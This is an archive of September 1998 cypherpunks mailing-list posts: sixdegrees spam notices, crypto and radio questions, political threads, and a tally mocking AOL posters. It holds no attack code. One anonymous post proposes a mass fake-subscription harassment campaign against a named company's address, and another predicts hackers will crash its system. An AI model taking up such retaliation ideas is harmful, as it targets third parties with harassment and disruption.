Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

   "...if you drink much from a bottle marked "poison."
  and it is almost certain to disagree with you, sooner or later"
             _Alice in Wonderland_: (Lewis Carroll)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<1dbe50n5@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 22:21:05 +0800
To: "Maelbom Sixty Grees"<cypherpunks@toad.com>
Subject: Nita Daniel
Message-ID: <199809170316.UAA00177@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Nita 
Daniel (machita@gurlmail.com) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 17 Sep 1998 01:40:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: radio net
Message-ID: <577cde4f1b43b42c6f5bac07a97ab122@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 10 Sep 1998, Robert Hettinga wrote:

> 
> Hey, guys,
> 
> Someone here already said it, but nobody else got it, so I'll repeat it:
> SSB, or Single Sideband. It's commercial ham radio, if you will, and all
> the ships use it. I expect that you can shove anything down an SSB set that
> you want, including encrypted traffic.
> 
> Ham radio is a government nerd subsidy, and as such, doesn't do much but
> make more government funded/sactioned/approved/whatever nerds. :-).
> 
> SSB would do just fine. It's an international standard, after all, and
> probably not under the control of any one government, even.e

Do you need a license for that one? Can someone explain what exactly the
sidebands are? It rings a bell and I used to know, but it's been around 15
years since I played with this kind of thing. It's just under the surface
of my brain, but I just can't place it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<4hce50m3@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 22:56:20 +0800
To: "Maelbom Sixty Grees"<cypherpunks@toad.com>
Subject: serene rebel
Message-ID: <199809170349.UAA00533@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately serene 
rebel (serene_rebel@hotmail.com) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<f8de50l5@auto.sixdegrees.com>
Date: Wed, 16 Sep 1998 23:23:28 +0800
To: "Maelbom Sixty Grees"<cypherpunks@toad.com>
Subject: Isaac Lee
Message-ID: <199809170418.VAA00935@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Isaac 
Lee (zac@pulp-fiction.com) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 16 Sep 1998 12:12:08 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Democracy...
In-Reply-To: <v03130302b224e28e4438@[209.133.20.11]>
Message-ID: <Pine.LNX.3.96.980917010252.8970A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, Tim May wrote:

> 
> At 7:27 PM -0700 9/15/98, Jaeger wrote:
> >hey, would you care to show us where "seperation of church and state" is
> >to be found in the constitution/bill of rights?  absolute right and
> 
> Gee, check out the First Amendment to the U.S. Constitution. Also the first
> item in the Bill of Rights. "Congress shall make no law respecting the
> establishment of religion or prohibiting the free exercise thereof..."
> (from memory, so don't bother me with minor wording corrections.)
> 
> By standard convention, this is also referred to as "separation of church
> and state."

Also check out the text of the Virginia law involving seperation of church
and state written by Thomas Jefferson.  (Should be required reading for
those who insist that the country is based on "Christian values".)  Any
good collection of the writings of Thomas Jefferson should have it. (My
copy was borrowed and never returned a few years ago... Argh!)

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 16 Sep 1998 12:19:33 +0800
To: cypherpunks@Algebra.COM
Subject: Re: your mail
In-Reply-To: <ee797071bb2c2c75a08a0bd4d6fca61a@anonymous>
Message-ID: <Pine.LNX.3.96.980917011950.8970E-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Sep 1998, Mixmaster wrote:

> 
> Monday, September 14, 1998 - 23:20:36
> 
> Question: How is it, that the FBI has so much power?
> Answer: Because 'the people' didn't do swat to stop them[the FBI].
> 
> Question: How do 'the people' change the situation?
> Answer: 'The people' get out their banners and megaphones and march on the Congress.
> 
> Question: What do 'the people' do then they[Congress] don't hear 'the people'?
> Answer: 'The people' go on strike.
> 
> Question: What do 'the people' do when Congress doesn't care about their strikes?
> Answer: 'The people' fire their M16'eens at Congress which they brought with them.
> 
> Question: So where are 'the people'?      

"Evil will prevail because good people are too busy having fun."

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<euee50v0@auto.sixdegrees.com>
Date: Thu, 17 Sep 1998 00:41:04 +0800
To: "monkeyboy cypher-prik"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809170534.WAA01624@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: monkeyboy cypher-prik
sixdegrees Password: leapsink

In response to your request for a new sixdegrees(tm) password, 
we have sent you the following temporary password: leapsink. 

As soon as you come to the site, http://www.sixdegrees.com , and use 
it to log-in on the home page, it will become your official 
password, and your old password will be deactivated. 

(If you end up remembering your old password and use that to 
log-in at the site before using this new temporary password, 
the temporary password will be deactivated.)

This may seem wacky, but it's for your security. And, either 
way, once you successfully log-in at the site, you can go to 
your personal profile and choose whatever password you like - 
in fact, we encourage you to do so.

If you never requested a new password and got this message in 
error, just continue using your old password and e-mail us at 
issues@sixdegrees.com. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================




E.SI.REQPW.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 16 Sep 1998 21:23:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: software
Message-ID: <30e187c88ea73d04fcdabbe178de992f@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Sep 1998 CHerr58414@aol.com wrote:

> 
> if u got any freeware for encripting and decodeing that would be great so if
> you can mail me back some info. Thanks
> 
> 

we gots lotz of hardware for people of ur abillitiez in fact our hardware
is really really hard so if u got any pictures of urself that would be
great so if you can mail us back some. Thanks

LamenessMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Wed, 16 Sep 1998 12:36:04 +0800
To: cypherpunks@cyberpass.net
Subject: 128 bit or 40 bit?
Message-ID: <67ee9e3cc8499f9d72a11a2df56c48fe@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Being outside North America, I have an "export" version of 
Internet Explorer/Netscape Navigator. These offer 40 bit 
encryption. (40 bit RC4, I understand).


My financial institution has a 128 bit Verisign certificate.
To my surprise, they claim this offers 128 bit encryption to /me/.
[in transactions to https://secure.mybank.com.xx]

I thought my 40 bit client limited the security to 40 bits.
Who is right? Please explain.

TIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 19:45:01 +0800
To: cypherpunks@Algebra.COM
Subject: The AOL Chronicles
Message-ID: <199809170045.CAA23060@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Every time one of these AOL wars start, the AOLers claim that there are a
few intelligent people on AOL and that our shunning of them based on
statistics is unjustified. We all know what the statistics are, but I
don't think anybody has done this for Cypherpunks yet. It has been done
other places. This isn't scientific with margins of error and everything,
but it's good enough to illustrate the point.

I went through every posting originating from AOL which was sent to
Cypherpunks between July and September 16th, which is today. I classified
postings as either "clueful" or "clueless," with the latter determined by
relevance to the list, literacy, quoting, and whether it makes any sense
at all. Anything completely stupid is also classed as "clueless."
"Clueful" is anything which is even remotely relevant to the list, and
includes quoted material if a followup. 

In addition, if an AOL user sends something clueless to the list then gets
flamed, that posting and any subsequent postings in that thread by the
original author are counted as clueless unless it's an apology, at which
point it isn't counted at all. The flames of said user are counted as
defense, not as clueless. Also, if I looked at the message but couldn't
tell what the hell the author was talking about because he didn't bother
to quote, I classed the posting as clueless. 

A "*" denotes that the portion I quote is the entire message. A "+" 
denotes that there was either no quoted material in the message or that it
used the "<<>>" style. Keep in mind that messages which are original would
not have quoted material, but still have a "+". A "H" means that it
contained HTML. I removed all new lines from the quotes to make them more
compact. If the posting was large, I quoted only some parts. 

Clueless posts from AOL:

1) "At least they have TCP/IP protocols now with Win 95 ex: Hiroshima
   45, Tsjernobyl 86, Windows 95 (Please, correct my spelling if I
   misspelled Tsjernobyl)" -- FTPPork@aol.com (Porker), 18 Aug 1998, (+)

2) "Ibelive by spooks he ment goverment agents not a racial slur so lay
   off." -- ILovToHack@aol.com, 31 Aug 1998, (+*)

3) "judy -- how about let's go shopping first and then watch the show
   remotely together????" -- Syniker@aol.com, 16 Jul 1998, (+)

4) "please i need some suggestions with topics for my informative speech,
   or may some infromative speeches already outlined to use it for
   refrence. thankyou." -- KMHAsfaha@aol.com, 17 Jul 1998, (*+)

5) "d" -- Saxgrim@aol.com, 18 Jul 1998, (*+)

6) "send me the book (e/mail me back" -- JackeI466@aol.com, 19 Jul 1998,
   (+*)

7) "Hello: My name is Enisa, I'm 13 years old. I write an online e-zine
   that for teens. We have over 150+ members. We just started a few days
   ago. We are looking for sponsors to sponsor our contests. These are
   some of the things we are able to do for you..." -- Craz8Grl@aol.com,
   20 Jul 1998, (+H)

8) "you got it?" -- LrdWill@aol.com, 20 Jul 1998, (+*)

9) "would love to see info re; international credit cards." --
   TTrump5646@aol.com, 21 Jul 1998, (+*)

10) "i would be very delighted if u gave me a free download for 5.0
    realplayer.if u would send it to mike111495@aol.com and
    indoe29c@aol.com we will be very honored to receive them. thankx and
    goodbye" -- Mike111495@aol.com, 22 Jul 1998, (+*)

11) [A bunch of asterisks and screaming] "I was recently informed from
    sorces who choose to remain annomous about a viri that uses macafe's
    update tool to detect when it is found then it modifys its code and
    forms a new strain of the virus this pattern continues although it has
    only been tested through a clone of macafees server to 100 mutations
    it looks like it could be a big problem I will inform you of any more
    information i learn about it but for now    "THE TRUTH IS OUT THERE""
    -- ILovToHack@aol.com, 22 Jul 1998, (+*)

12) "WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?" --
    koitch@aol.com, 23 Jul 1998, (+*)

13) [Subject: Pipe bombs r better] "they rule!" -- Ant6menace@aol.com, 23
    Jul 1998, (+*)

14) "Actually, AOL, along with being an acceptable ISP with built in
    authentication of sender, has an easily used Mail interface.  (Even if
    it doesn't exactly follow the standards.)" -- MMerlynne@aol.com, 24
    Jul 1998, (+*), in response to #12.

15) "HELLO, IS THERE ANY WAY TO GET MY HANDS ON S BOOK THAT SHOWS THE REAL
    BASEBALL PEOPLE AUTOGRAPHS AND THE FAKES SO I KNOW WHAT TO LOOK FOR???
    PLEASE REPLY" -- AT666IND@aol.com, 25 Jul 1998, (+*)

16) "I am trying to find my brother, "Allen Thomas Taylor" I am not sure
    what year he was born but I think it was l922, l923.  We have the same
    Father[...]" -- CEr1942929@aol.com (Christine Ernest), 26 Jul 1998,
   (+)

17) "Hey:  Who made up the term "Politically Correct"?  Not Christians and
    not Republicans. Your side did.  How does wanting a smaller
   government, less taxes, the freedom to CHOOSE to pray in schools, the
   rights of the un-born( of[...] CHOKE ON IT YOU HYPOCRITE" --
   JBrown4330@aol.com, 27 Jul 1998, (+)

18) "do you have music vinyl stickers , if so , could i get them
    wholesale?" -- Babybee390@aol.com, 29 Jul 1998, (+*)

19) "I'm looking for Lynrd Skynrds Freebird  on a window sticker for my
    car.  Do you know where I can find one?" -- Vox9869@aol.com, 28 Jul
   1998, (+*)

20) "More!" -- CLCTCHR@aol.com, 29 Jul 1998, (+*)

21) "Can you do a 5 color process?  4x4".  Price on 500,1000,1500" --
    ELarson100@aol.com, 4 Aug 1998, (+*)

22) [Subject: whut up] "looking for a place to have some Band stickers
    made, can you email me a phone number so we can check out some
    prices.....thanks TIm" -- FRETELUCO@aol.com, 6 Aug 1998, (+*)

23) "Could you please send me the Anarchy Cookbook.....I really want it
    and I cant find it anywhere! Thanx for your help.. Mike Jonhson" --
    XoVoX123@aol.com, 9 Aug 1998, (+*)

24) [Subject: .] "" (Yes, nothing.) -- EpicTeU@aol.com, 9 Aug 1998, (+*)

25) "Come on thake it easy on the guy at least he aint on AOL or somthing
    stuped." -- ILovToHack@aol.com, 13 Aug 1998, ()

26) [Subject: Subject: LOL. Made me look] "" (Yes, nothing.) --
    Seabiner@aol.com, 14 Aug 1998, (+*)

27) "about: Hello, I am trying to start a VB 32 bit code bank you can send
    any code you want to exept codes for aol addons...  . 1nce a week most
    likely on fridays I will check the hotmail account specifyed below and
    I will take all the codes and put them in a txt file and send it to
    everyone who sent a code in since I am [...] To send Codes for the ML
    Send E-mail to VB32Coders@Hotmail.com In the sbject field write
    anonymous / Code topic if you don't want your E-Mail address to show
    up when I send the Codes out or else just type the topic of the code
    you are sending.. ." -- EpicTeU@aol.com, 14 Aug 1998, (+)

28) "Because the American Justice system is screwed up royally... for
   instance - Kevin Mitnick... www.KevinMitnick.com" -- FTPPork@aol.com,
   17 Aug 1998, (+*)

29) "I am interested in travel between Knoxville, Tennessee  and Des
    Moines, Iowa. I would also be interested in Nashville, Tennessee and
    Des Moines, Iowa or Atlanta and Des Moines, Iowa.  Please notify me of
    specials in these markets. Thanks, Linda Tisue ltisue@aol.com" --
    Ltisue@aol.com, 18 Aug 1998, (+*)

30) "I am looking to distribute a product and I was wondering if you can
    tell me how to get mass e mail addresses. I look forward to hearing
    from you." -- LHilley488@aol.com, 19 Aug 1998, (+*)

31) "Send me info on how to make a pipe bomb. HoppyF1315" --
    HOPPYF1215@aol.com (Hoppy Head), 19 Aug 1998, (+*)

32) "I take that statement as an insult, and it really isn't true about
    all of us AOL users. [...] Actually, some of us know what real hacking
    is...[...] Anyway, try not to stereotype people so much, because, with
    the Advent of 32 bit AOL, we can actually use all of the TCP/IP
    protocols, etc..." -- FTPPork@aol.com, 20 Aug 1998, (+)

33) [Subject: anarchy cookbook] "Is any one home?" -- Spazherp@aol.com, 21
    Aug 1998, (+*)

34) "I did not say anywhere that 32 bit would fix problems of cluelessness
    - or ignorance in your case.  I said, it is a little better because we
   can now use TCP/IP protocols.  Did I ever say that the people on AOL
   were smarter because of it?  Well, let's go read over that post - - -
   nope... I didn't.  I think some people should read a little more
   carefully, or just don't read at all." -- FTPPork@aol.com, 22 Aug 1998,
   (+*) (As I recall, this one was in response to a set of flames which
   cited his assertion in #32.)

35) [Subject: can you help me make virses please tell me who to make one
    step by step] "I need help i want to know how to make a virses in
    c\c++ please help me." -- VXF32@aol.com, 21 Aug 1998, (+*)

36) "Tell me how to get tons of free stuff!  Thank You ." --
    RAGOD5597@aol.com, 21 Aug 1998, (+*)

37) "Here we go again" -- FTPPork@aol.com, 22 Aug 1998, (+*)

38) [Subject: tell me] "hola and good tidings send some info on spooks
    please i will be grateful" -- RyanFord@aol.com, 29 Aug 1998, (+*)

39) [Subject: h] "how did u do it" -- CRBREW9802@aol.com, 7 Sep 1998, (+*)

40) " HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima
    startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ
    anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR
    LeeTo K Pe@CE FrOmE The LeeTs HacKJeFFrO)" -- Jrjeffro@aol.com, 9 Sep
    1998, (+*)

41) Message quoting the above, which wasn't originally sent to the list,
    in "<< >>" style, adding only: "What the hell is this? No wonder why
    AOLers have a bad name Im going to Flame this guy" -- EpicTeU@aol.com,
    10 Sep 1998, (+*)

42) "Preach on brother =)" -- AIMSX@aol.com, 15 Sep 1998, (+*), copied to
    25 other recipients, plus the list.

43) "I read that book" -- AIMSX@aol.com, 15 Sep 1998, (+*)

44) "All Creatures Great and Small - that one... =) I also read an Aasimov
    a while back in fifth grade - unfortunately, I can't remember even the
    name... I need to pick some of his books up again... One book I can
    remember reading since 5th grade (and every summer thereafter) is "IT"
    by Stephen King - one of his few really good books.  I have read it 8
    times since. I greatly recommend it =)" -- AIMSX@aol.com, 15 Sep 1998,
    (+*)

45) "We are sending you an invitation to be one of our special guests this
    year, big harry ass lawsuits are always of interest.  Bring a friend
    if you like, but I have to warn you, Liberatarians are not welcome.
    This years menu includes red meat and poptarts.  Clothing is optional.
    Sincerely, Beth" -- BUFFU@aol.com, 17 Jul 1998, (+*)

46) "That's why I suggest listening to I Robot by Alan Parson's Project."
    -- StanSqncrs@aol.com, 18 Jul 1998, (+*)

47) "If sombody offers you some FedGov, just say NO!" --
    Nilsphone@aol.com, 23 Jul 1998, (), copied to 32 recipients, including
    the list.

Note the "+" ratings on the below. (Semi-)Clueful postings from AOL:

1) "It's the easy way out (and I mean DOWN and OUT)!  I mean, if we're
   simply going to change them out everytime, why bother to figure out
   which ones a going to change them out everytime, why bother to figure
   out which ones aren't evil/stupid (I mean, out of all those
   politicians, there's got to be 1 or 2! I think. ;-) )? See, if we just
   simply change politicians at every chance, then we throw the baby out
   with the bathwater, so to speak.  The simple solutions aren't always
   the best ones." -- StanSqncrs@aol.com, 17 Jul 1998, (+*)

2) "ROFLOL!  What's coincidental?  The latest tune that my band, Nobody's
   Business (in which I play bass and sing) has learned, is Cheap
   Sunglasses by ZZ Top. If it ain't coinicidence, I got a 'scarecrow' in
   my band. " -- StanSqncrs@aol.com, 18 Jul 1998, (+)

3) [Subject: Subject: Nomination of Lyndon Larouche to the UNITED NATIONS
   OF THE FRINGE] "Hey Punks, As a United Nations OF the Cyber Fringe
   Member,  I am asking for your input on giving Lyndon a nomination.  So
   far his war crimes only include[...]" -- BUFFU@aol.com, 20 Jul 1998,
   (+)

4) "If you would like information about tempest monitors, computers,
   printers or secure fax machines, please contact me." --
   CompSec01@aol.com (Karen Azoff), 22 Jul 1998, (+)

I gave up at this point because the clueless list just kept growing. The
ratio isn't encouraging, especially since I was being generous with what
is considered a "clueful post."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 20:04:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: It's finally over (was Re: Explanation of Harald Fragner and  cyph
Message-ID: <199809170105.DAA24665@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > And thanks, but we have enough magazine subscriptions already.  :)
> > 
> > Mark
> > 
> > Bart Troyan wrote:
> > > 
> > > The real-world analogy would be for me and all my friends to get a bunch of
> > > magazines, rip out all those postage-paid subscription flaps, and fill out
> > > your name and address on each of them, then you'd have unwanted trial
> > > subscriptions to lots and lots of magazines.
> > > 
> > > hmmmm...
> > > MacroView
> > > 90 William Street, Suite 301
> > > New York, NY 10038
> > > 
> > > Wouldn't that suck?  Can you imagine if 1000 people did that to you all the
> > > same day?  (this is *not* a threat, just an example).  You'd have bags and
> > > bags of zines and bills coming in daily...

This sounds like a plan. In fact, we can do this for all spam
domains. Interested, Tim?

Registrant:
MacroView (SIXDEGREES-DOM)
   90 William Street, Suite
   301
   New York, NY 10038

   Domain Name: SIXDEGREES.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 17 Sep 1998 06:38:47 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <85276ff4386bf1b830fc58b635f7aaa0@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



looking around on various crypto sites I can't find any hashes ported to dos/win that are already compiled is anyone out there aware of a place with a copy o MD5 or SHA1 and my second question,  I was also curious about PGP.  In the latest version (cyberknights build) You can use 8kbits DH key or a 16Kbits RSA key,  In my reasoning I would think that since DH was out before RSA and RSA was chosen for the first releases of PGP why switch to DH now, if it was better why not start out using that?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 17 Sep 1998 07:10:31 +0800
To: Tim May <tcmay@got.net>
Subject: Re: A personal response to your email to sixdegrees
In-Reply-To: <v03130301b225b4156c32@[209.66.100.71]>
Message-ID: <Pine.GSO.3.95.980917050816.11470D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Better yet, give anyone on the mailing list a veto over their new
membership. Send a cookie to the address that was signed up, and an
anti-cookie. If anyone returns the anti-cookie, in effect saying "we don't
want to be part of your blasted service," put them on a list of
do-not-contact people for half a year or so.

That will minimise disruptions. It will also minimise disruptions to your
service when pissed-off vigilantes decide to take matters into their own
hands.

-Declan


On Wed, 16 Sep 1998, Tim May wrote:

> At 10:09 AM -0700 9/16/98, Declan McCullagh wrote:
> >Mark, trust me on this: remove all five cypherpunks addresses from your
> >lists.
> >
> >Really.
> >
> 
> As others have noted, operations like "sixdegrees" need to be very careful
> about how list addresses are signed up. This is a problem mailing lists
> (formerly called "list exploders," until Congress began to rant about
> Internet terrorists) have been dealing with for many years.
> 
> "Lists subscribed to lists," with resulting circularity problems, is
> something that can bring a list to standstill.
> 
> >From the dozens of irate messages about "sixdegrees," and the joking
> responses sent to "I hear you are my friend, but who are you?" queries seen
> from hapless "sixdegrees" clients, the meltdown may be underway.
> 
> There are concrete things you folks can do. When someone is nominated (or
> whatever) as a potential contact, you can ask the contactee if he or she
> wants this person to be a contact. In other words, take some of the
> automation out of the loop.
> 
> (Or add more of the right kind, such as sending a cookie or chit back to
> the parties and require them to forward the cookies back. This, of course,
> adds complexity for the "sixdegrees" customers and may actually cause many
> of them to just give up in frustration.)
> 
> If you do nothing, expect many of us to get more and more irate at the
> abuses your service are facillitating. I expect some of the list
> subscribers on lists your service "infects" will take the usual hackers
> measures to crash your system.
> 
> Not that I necessarily endorse this, but it's happened in the past.
> 
> --Tim May
> 
> (This space left blank pending determ. of acceptability to the gov't.)
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 22:28:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809170324.FAA02439@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



"Electronic Security & Counterintelligence" must become pervasive, and this
is only possible if we release the private sector from artificial
constraints on encryption, and if we return to our democratic foundation,
the respect
for personal privacy. We cannot regulate this, we can only nurture this
fundamental national security arena.    

TAKEDOWN:
Targets, Tools, & Technocracy                                             
Robert David Steele
http://carlisle-www.army.mil/usassi/ssipubs/stratcon/steele.htm


Another excerpt: 

2.The greatest obstacle our government faces today in assuring national
security and national competitiveness-the cause of causes for conflict and
economic loss-is the growing gap between those with power and those with
knowledge. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Industry.net News" <newsletter@info.industry.net>
Date: Thu, 17 Sep 1998 08:25:22 +0800
To: cypher <cypherpunks@toad.com>
Subject: Industry.net Announces Premium Membership
Message-ID: <19980917062002.000045@langly.emailpub.com>
MIME-Version: 1.0
Content-Type: text/plain



As an Industry.net member, you already know how convenient it is
to have one place to go for industry news, events, and sources of
supply. In addition to this free content, Industry.net recently
introduced Premium Membership, your gateway to engineering databases
in the exclusive Data Depot and even more technical resources in
the Reference Shelf. Sign up now and enjoy all the benefits of
Premium Membership for the low, introductory price of $19.95 per year.


Read on for more details or visit http://www.industry.net/pm-mktg/.

Data Depot
Industry.net's Data Depot is a gateway to comprehensive
technical industrial products and components information.

-  Make design and specification decisions using complete technical
   product descriptions with Industry.net's exclusive Industrial
   Catalogs at http://www.industry.net/pm-mktg/icdescription.htm.
   As a Premium Member, for only $37.95 per month, you can access
   catalogs from over 15,000 manufacturers and distributors of
   industrial products and services.  The Industrial Catalogs have
   been subject indexed and cross-referenced enabling you to quickly
   search and FIND the company or product you are interested in.

   Watch for future additions to Industry.net's Data Depot including
   online ordering of more than 200,000 technical standards,
   specifications, and reference documents; downloadable industry
   standards; and key supplier information on more than 12 million
   parts.

Reference Shelf
Industry.net's Reference Shelf provides fingertip access to many
reference tools and resources that engineers use on a daily basis.

-  Make sure your technical documentation is in compliance with
   current industry standards with the online Drawing Requirements
   Manual.

-  Enjoy convenient, fingertip access to frequently used (but often
   forgotten) engineering equations and formulas.

-  Apply NASA technology to your commercial applications and product
   development.

-  Stay abreast of changing federal and state safety and compliance
   regulations.

-  Catch up with previously published Industry.net information in our
   Archives section.

-  Keep pace with manufacturing technology with the Integrated
   Manufacturing Technologies Roadmap (IMTR).

-  More to come

Visit http://www.industry.net and get access to a world of information
at your fingertips!  In case you have forgotten your username, it is:
crads.

Would you like to participate in a focus group where we brainstorm
enhancements to Industry.net?  (send your response to
feedback@industry.net)

Would your company benefit from a presence on the Industry.net site?
(send your response to sales@industry.net and provide the name of your
marketing representative)

If you would rather not be notified about new features on Industry.net,
please unsubscribe by doing the following: (be assured that we respect
your privacy and will not contact you further and we never send your
name and/or e-mail address to other parties)

Reply to this message or send e-mail to newsletter@info.industry.net
with the subject line: "unsubscribe industry.net-news".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 23:23:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809170420.GAA06902@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Run hands through hair. 
    Tighten clothing on each arm using the opposite hand. 
    Pull excess clothing around chest tight around chest, then pull
clothing forward. 
    Sweep back of hand through cleavage and under breasts. 
    Loosen belt and sweep fingers through belt-line front to back. 
    Use back of hand to sweep down zipper-line. 
    Search legs using hands making very slow movements. 
    Loosen shoes and sweep fingers through top of shoes.


The president?  No, the air force, searching personnel during
'Peace'.   

http://call.army.mil/call/trngqtr/tq2-99/hutton3.htm
and cars: http://call.army.mil/call/trngqtr/tq2-99/hutton2.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 17 Sep 1998 09:24:41 +0800
To: cypherpunks@cyberpass.net
Subject: CDA II up for subcommittee vote today in House
Message-ID: <Pine.GSO.3.95.980917072319.3792M-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 17 Sep 1998 07:23:07 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: CDA II up for subcommittee vote today in House




http://cgi.pathfinder.com/netly/0,2326,201980917-14617,00.html

Time Digital Daily
September 17, 1998

   Congress to Debate CDA II This Morning
   By Declan McCullagh (declan@well.com)

   It was one thing to vote for the Communications Decency Act, as
   Congress did before the Supreme Court ruled that it was violently
   unconstitutional. It's quite another to knowingly circumvent that
   ruling by voting for its successor, as a Congressional panel may do
   this morning. At 10 AM this morning a House Commerce subcommittee is
   scheduled to debate Rep. Mike Oxley (R-Ohio)'s CDA II, and free speech
   advocates are in a tizzy.

[...snip...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Sep 1998 06:47:52 +0800
To: cypherpunks@toad.com
Subject: IRS Spam on CJ
Message-ID: <199809171142.HAA13399@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is a follow-up to the IRS Jim Bell spam last year, the IRS
